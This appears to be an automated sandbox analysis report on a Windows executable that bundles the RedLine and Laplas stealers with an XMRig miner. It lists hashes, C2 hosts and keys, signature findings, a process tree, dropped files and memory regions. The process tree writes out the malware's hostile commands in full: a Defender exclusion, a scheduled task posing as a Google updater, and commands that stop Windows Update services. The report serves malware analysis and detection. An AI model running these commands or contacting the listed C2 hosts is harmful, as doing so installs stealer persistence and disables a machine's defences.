Analysis

  • max time kernel
    280s
  • max time network
    302s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    13-07-2023 00:14

General

  • Target

    1ca6070d9a141d51ccc4f75ab90095cc7fa3791c54ec10ee042b96a815822c94.exe

  • Size

    2.3MB

  • MD5

    3c55617e6b69330386a0350e9f6aa0b4

  • SHA1

    99bff391433cfc610b27f3b2b7ebc3239314f831

  • SHA256

    1ca6070d9a141d51ccc4f75ab90095cc7fa3791c54ec10ee042b96a815822c94

  • SHA512

    46eac86da241ab7b98d449e31111c9da154109b493bf62e807cffcdb43767167c994a165d78ec9a4ce24ea4f64ec76edee39daf9408bad3d6e65b64b1b6b1c28

  • SSDEEP

    49152:X4MR20Q9Xz2p2pizrXPHaBXtHqNQ6cBUX0biao10PzFyPawde5Gir:X41MEpyHaZUNFcBUEfoIgPFTir

Malware Config

Extracted

Family

redline

Botnet

120723_rc_11

C2

rcam.tuktuk.ug:11290

Attributes
  • auth_value

    3a7b4b38a7116be1f337083fb37de790

Extracted

Family

laplas

C2

http://lpls.tuktuk.ug

Attributes
  • api_key

    a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • XMRig Miner payload 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Themida packer 25 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1284
      • C:\Users\Admin\AppData\Local\Temp\1ca6070d9a141d51ccc4f75ab90095cc7fa3791c54ec10ee042b96a815822c94.exe
        "C:\Users\Admin\AppData\Local\Temp\1ca6070d9a141d51ccc4f75ab90095cc7fa3791c54ec10ee042b96a815822c94.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2492
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
          3⤵
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2936
          • C:\Users\Admin\AppData\Local\Temp\Octium.exe
            "C:\Users\Admin\AppData\Local\Temp\Octium.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • Checks whether UAC is enabled
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of WriteProcessMemory
            PID:1204
            • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
              C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:2020
          • C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe
            "C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Drops file in Drivers directory
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            PID:852
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2724
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2436
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:676
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2776
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2684
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2128
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2112
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2200
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:396
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2044
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            3⤵
            • Creates scheduled task(s)
            PID:1628
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
            PID:784
            • C:\Windows\System32\powercfg.exe
              powercfg /x -standby-timeout-ac 0
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2712
            • C:\Windows\System32\powercfg.exe
              powercfg /x -standby-timeout-dc 0
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2708
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1216
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2308
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe
            2⤵
              PID:2344
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2980
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            1⤵
            • Launches sc.exe
            PID:2528
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            1⤵
            • Launches sc.exe
            PID:2208
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2132
          • C:\Windows\System32\sc.exe
            sc stop bits
            1⤵
            • Launches sc.exe
            PID:1732
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            1⤵
            • Launches sc.exe
            PID:2176
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            1⤵
            • Launches sc.exe
            PID:1952
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {FD6E3E67-39AB-4AC4-84F6-FC011525C622} S-1-5-18:NT AUTHORITY\System:Service:
            1⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:284
            • C:\Program Files\Google\Chrome\updater.exe
              "C:\Program Files\Google\Chrome\updater.exe"
              2⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Drops file in Drivers directory
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1656
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            1⤵
            • Launches sc.exe
            PID:2256
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            1⤵
            • Launches sc.exe
            PID:1144
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1244
          • C:\Windows\System32\sc.exe
            sc stop bits
            1⤵
            • Launches sc.exe
            PID:2188
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            1⤵
            • Launches sc.exe
            PID:1372
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            1⤵
            • Launches sc.exe
            PID:1556

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • C:\Users\Admin\AppData\Local\Temp\Octium.exe

            Filesize

            4.2MB

            MD5

            f206c33258de47d5e05e9f035efc265c

            SHA1

            c744ea5b001dc4a9b1e16dd736f44d0d3e9be002

            SHA256

            298bdf9042629b42e761f52949926d52acd55239181021fd78040bff32678e4a

            SHA512

            ef249fcb285fd3741e538a76ace582cdfa6042b2f559fa95a8a0245c7a09e3cf675150c1fd42f50383790b553a578c06cd898ef915ebf85e2cc6aab24ea3f90a

          • C:\Users\Admin\AppData\Local\Temp\Octium.exe

            Filesize

            4.2MB

            MD5

            f206c33258de47d5e05e9f035efc265c

            SHA1

            c744ea5b001dc4a9b1e16dd736f44d0d3e9be002

            SHA256

            298bdf9042629b42e761f52949926d52acd55239181021fd78040bff32678e4a

            SHA512

            ef249fcb285fd3741e538a76ace582cdfa6042b2f559fa95a8a0245c7a09e3cf675150c1fd42f50383790b553a578c06cd898ef915ebf85e2cc6aab24ea3f90a

          • C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

            Filesize

            7KB

            MD5

            3baa89e4203c864814f555aed3c0ffde

            SHA1

            a815a16da666a53276e5a95f49b24126a30e6a96

            SHA256

            7dfc41f7f45b31e4dd6b70082083e5fe4db14ee42382e8cd5fb91ff51fcb0ff7

            SHA512

            4cd2038915353a20cb1a080844483b1c243789be08c21e1e609f46dcf28945d9461ccc5c621d35b812379a975c50ecf6048141803741084233a09d4c708e9128

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ITADQJVTAV6TOXVD22LF.temp

            Filesize

            7KB

            MD5

            3baa89e4203c864814f555aed3c0ffde

            SHA1

            a815a16da666a53276e5a95f49b24126a30e6a96

            SHA256

            7dfc41f7f45b31e4dd6b70082083e5fe4db14ee42382e8cd5fb91ff51fcb0ff7

            SHA512

            4cd2038915353a20cb1a080844483b1c243789be08c21e1e609f46dcf28945d9461ccc5c621d35b812379a975c50ecf6048141803741084233a09d4c708e9128

          • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

            Filesize

            727.2MB

            MD5

            558616c7f41e97ae6694170b304a3f2b

            SHA1

            9b58d15a35993e5029665a46f37af3d91ddc5a32

            SHA256

            d19ef81b8a98c1c858494564945c22bc6084f631bb24efc5490f4fffe0ff9009

            SHA512

            8f1e821ac4e82b28573ce9154e57758e22dd352c7fad15f82957e2196bad1ad53b547237deb987888823b7624a2344df9c4d6142f1f320248c0c24026fadbecb

          • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

            Filesize

            727.2MB

            MD5

            558616c7f41e97ae6694170b304a3f2b

            SHA1

            9b58d15a35993e5029665a46f37af3d91ddc5a32

            SHA256

            d19ef81b8a98c1c858494564945c22bc6084f631bb24efc5490f4fffe0ff9009

            SHA512

            8f1e821ac4e82b28573ce9154e57758e22dd352c7fad15f82957e2196bad1ad53b547237deb987888823b7624a2344df9c4d6142f1f320248c0c24026fadbecb

          • C:\Windows\System32\drivers\etc\hosts

            Filesize

            2KB

            MD5

            3e9af076957c5b2f9c9ce5ec994bea05

            SHA1

            a8c7326f6bceffaeed1c2bb8d7165e56497965fe

            SHA256

            e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e

            SHA512

            933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

          • \Program Files\Google\Chrome\updater.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • \Users\Admin\AppData\Local\Temp\Octium.exe

            Filesize

            4.2MB

            MD5

            f206c33258de47d5e05e9f035efc265c

            SHA1

            c744ea5b001dc4a9b1e16dd736f44d0d3e9be002

            SHA256

            298bdf9042629b42e761f52949926d52acd55239181021fd78040bff32678e4a

            SHA512

            ef249fcb285fd3741e538a76ace582cdfa6042b2f559fa95a8a0245c7a09e3cf675150c1fd42f50383790b553a578c06cd898ef915ebf85e2cc6aab24ea3f90a

          • \Users\Admin\AppData\Local\Temp\TaskMnr.exe

            Filesize

            12.5MB

            MD5

            8dbc96129e97e6f44fe615670544f915

            SHA1

            8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

            SHA256

            0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

            SHA512

            63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

          • \Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

            Filesize

            727.2MB

            MD5

            558616c7f41e97ae6694170b304a3f2b

            SHA1

            9b58d15a35993e5029665a46f37af3d91ddc5a32

            SHA256

            d19ef81b8a98c1c858494564945c22bc6084f631bb24efc5490f4fffe0ff9009

            SHA512

            8f1e821ac4e82b28573ce9154e57758e22dd352c7fad15f82957e2196bad1ad53b547237deb987888823b7624a2344df9c4d6142f1f320248c0c24026fadbecb

          • memory/284-180-0x000000013F890000-0x0000000140830000-memory.dmp

            Filesize

            15.6MB

          • memory/284-186-0x000000013F890000-0x0000000140830000-memory.dmp

            Filesize

            15.6MB

          • memory/852-170-0x000000013FDE0000-0x0000000140D80000-memory.dmp

            Filesize

            15.6MB

          • memory/852-125-0x000000013FDE0000-0x0000000140D80000-memory.dmp

            Filesize

            15.6MB

          • memory/852-128-0x000000013FDE0000-0x0000000140D80000-memory.dmp

            Filesize

            15.6MB

          • memory/852-127-0x000000013FDE0000-0x0000000140D80000-memory.dmp

            Filesize

            15.6MB

          • memory/852-123-0x000000013FDE0000-0x0000000140D80000-memory.dmp

            Filesize

            15.6MB

          • memory/852-124-0x000000013FDE0000-0x0000000140D80000-memory.dmp

            Filesize

            15.6MB

          • memory/852-122-0x000000013FDE0000-0x0000000140D80000-memory.dmp

            Filesize

            15.6MB

          • memory/852-142-0x000000013FDE0000-0x0000000140D80000-memory.dmp

            Filesize

            15.6MB

          • memory/852-126-0x000000013FDE0000-0x0000000140D80000-memory.dmp

            Filesize

            15.6MB

          • memory/1204-133-0x00000000000B0000-0x00000000009CD000-memory.dmp

            Filesize

            9.1MB

          • memory/1204-110-0x00000000000B0000-0x00000000009CD000-memory.dmp

            Filesize

            9.1MB

          • memory/1204-111-0x00000000000B0000-0x00000000009CD000-memory.dmp

            Filesize

            9.1MB

          • memory/1204-115-0x00000000000B0000-0x00000000009CD000-memory.dmp

            Filesize

            9.1MB

          • memory/1204-116-0x00000000000B0000-0x00000000009CD000-memory.dmp

            Filesize

            9.1MB

          • memory/1204-107-0x00000000000B0000-0x00000000009CD000-memory.dmp

            Filesize

            9.1MB

          • memory/1204-108-0x00000000000B0000-0x00000000009CD000-memory.dmp

            Filesize

            9.1MB

          • memory/1204-109-0x00000000000B0000-0x00000000009CD000-memory.dmp

            Filesize

            9.1MB

          • memory/1656-181-0x000000013F890000-0x0000000140830000-memory.dmp

            Filesize

            15.6MB

          • memory/1656-174-0x000000013F890000-0x0000000140830000-memory.dmp

            Filesize

            15.6MB

          • memory/1656-206-0x000000013F890000-0x0000000140830000-memory.dmp

            Filesize

            15.6MB

          • memory/1656-187-0x000000013F890000-0x0000000140830000-memory.dmp

            Filesize

            15.6MB

          • memory/1656-176-0x000000013F890000-0x0000000140830000-memory.dmp

            Filesize

            15.6MB

          • memory/1656-175-0x000000013F890000-0x0000000140830000-memory.dmp

            Filesize

            15.6MB

          • memory/1752-193-0x000000000033B000-0x0000000000372000-memory.dmp

            Filesize

            220KB

          • memory/1752-192-0x0000000000334000-0x0000000000337000-memory.dmp

            Filesize

            12KB

          • memory/2020-134-0x0000000000070000-0x000000000098D000-memory.dmp

            Filesize

            9.1MB

          • memory/2020-146-0x0000000000070000-0x000000000098D000-memory.dmp

            Filesize

            9.1MB

          • memory/2020-143-0x0000000000070000-0x000000000098D000-memory.dmp

            Filesize

            9.1MB

          • memory/2020-140-0x0000000000070000-0x000000000098D000-memory.dmp

            Filesize

            9.1MB

          • memory/2020-138-0x0000000000070000-0x000000000098D000-memory.dmp

            Filesize

            9.1MB

          • memory/2020-137-0x0000000000070000-0x000000000098D000-memory.dmp

            Filesize

            9.1MB

          • memory/2020-139-0x0000000000070000-0x000000000098D000-memory.dmp

            Filesize

            9.1MB

          • memory/2020-136-0x0000000000070000-0x000000000098D000-memory.dmp

            Filesize

            9.1MB

          • memory/2020-144-0x0000000000070000-0x000000000098D000-memory.dmp

            Filesize

            9.1MB

          • memory/2020-141-0x0000000000070000-0x000000000098D000-memory.dmp

            Filesize

            9.1MB

          • memory/2020-135-0x0000000000070000-0x000000000098D000-memory.dmp

            Filesize

            9.1MB

          • memory/2044-198-0x00000000010B0000-0x0000000001130000-memory.dmp

            Filesize

            512KB

          • memory/2044-210-0x00000000010B0000-0x0000000001130000-memory.dmp

            Filesize

            512KB

          • memory/2044-197-0x00000000010B0000-0x0000000001130000-memory.dmp

            Filesize

            512KB

          • memory/2044-199-0x00000000010B0000-0x0000000001130000-memory.dmp

            Filesize

            512KB

          • memory/2044-196-0x00000000010B0000-0x0000000001130000-memory.dmp

            Filesize

            512KB

          • memory/2436-167-0x000000000249B000-0x00000000024D2000-memory.dmp

            Filesize

            220KB

          • memory/2436-165-0x0000000002050000-0x0000000002058000-memory.dmp

            Filesize

            32KB

          • memory/2436-166-0x0000000002494000-0x0000000002497000-memory.dmp

            Filesize

            12KB

          • memory/2436-164-0x000000001B130000-0x000000001B412000-memory.dmp

            Filesize

            2.9MB

          • memory/2492-70-0x00000000004F0000-0x0000000000505000-memory.dmp

            Filesize

            84KB

          • memory/2492-72-0x00000000004F0000-0x0000000000505000-memory.dmp

            Filesize

            84KB

          • memory/2492-62-0x0000000004E90000-0x0000000004ED0000-memory.dmp

            Filesize

            256KB

          • memory/2492-63-0x00000000004F0000-0x0000000000505000-memory.dmp

            Filesize

            84KB

          • memory/2492-64-0x00000000004F0000-0x0000000000505000-memory.dmp

            Filesize

            84KB

          • memory/2492-66-0x00000000004F0000-0x0000000000505000-memory.dmp

            Filesize

            84KB

          • memory/2492-68-0x00000000004F0000-0x0000000000505000-memory.dmp

            Filesize

            84KB

          • memory/2492-84-0x00000000004F0000-0x0000000000505000-memory.dmp

            Filesize

            84KB

          • memory/2492-74-0x00000000004F0000-0x0000000000505000-memory.dmp

            Filesize

            84KB

          • memory/2492-98-0x0000000000870000-0x0000000000DD8000-memory.dmp

            Filesize

            5.4MB

          • memory/2492-61-0x00000000004F0000-0x000000000050C000-memory.dmp

            Filesize

            112KB

          • memory/2492-60-0x0000000000870000-0x0000000000DD8000-memory.dmp

            Filesize

            5.4MB

          • memory/2492-78-0x00000000004F0000-0x0000000000505000-memory.dmp

            Filesize

            84KB

          • memory/2492-57-0x0000000000870000-0x0000000000DD8000-memory.dmp

            Filesize

            5.4MB

          • memory/2492-76-0x00000000004F0000-0x0000000000505000-memory.dmp

            Filesize

            84KB

          • memory/2492-58-0x0000000000870000-0x0000000000DD8000-memory.dmp

            Filesize

            5.4MB

          • memory/2492-82-0x00000000004F0000-0x0000000000505000-memory.dmp

            Filesize

            84KB

          • memory/2492-80-0x00000000004F0000-0x0000000000505000-memory.dmp

            Filesize

            84KB

          • memory/2492-86-0x00000000004F0000-0x0000000000505000-memory.dmp

            Filesize

            84KB

          • memory/2724-155-0x00000000025E0000-0x0000000002660000-memory.dmp

            Filesize

            512KB

          • memory/2724-157-0x00000000025EB000-0x0000000002622000-memory.dmp

            Filesize

            220KB

          • memory/2724-153-0x0000000001D30000-0x0000000001D38000-memory.dmp

            Filesize

            32KB

          • memory/2724-152-0x000000001B040000-0x000000001B322000-memory.dmp

            Filesize

            2.9MB

          • memory/2724-154-0x00000000025E0000-0x0000000002660000-memory.dmp

            Filesize

            512KB

          • memory/2724-156-0x00000000025E0000-0x0000000002660000-memory.dmp

            Filesize

            512KB

          • memory/2936-91-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

            Filesize

            4KB

          • memory/2936-88-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

          • memory/2936-94-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

          • memory/2936-112-0x00000000080E0000-0x00000000089FD000-memory.dmp

            Filesize

            9.1MB

          • memory/2936-87-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

          • memory/2936-90-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

          • memory/2936-89-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

          • memory/2936-92-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

          • memory/2936-96-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

          • memory/2936-99-0x00000000001F0000-0x00000000001F6000-memory.dmp

            Filesize

            24KB

          • memory/2936-100-0x00000000025E0000-0x0000000002620000-memory.dmp

            Filesize

            256KB

          • memory/2936-101-0x00000000025E0000-0x0000000002620000-memory.dmp

            Filesize

            256KB

          • memory/2980-208-0x0000000000BB0000-0x0000000000BD0000-memory.dmp

            Filesize

            128KB

          • memory/2980-213-0x0000000000BB0000-0x0000000000BD0000-memory.dmp

            Filesize

            128KB